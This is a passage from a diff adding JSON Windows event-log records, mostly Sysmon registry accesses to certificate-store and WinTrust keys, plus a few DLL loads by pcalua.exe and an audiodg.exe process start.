"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\AUDIODG.EXE 0x318", + "event_type": "process", + "logon_id": 997, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 6784, + "ppid": 2136, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "subtype": "create", + "timestamp": 131883573975300000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}", + "unique_ppid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "duser.dll", + "image_path": "C:\\Windows\\System32\\duser.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 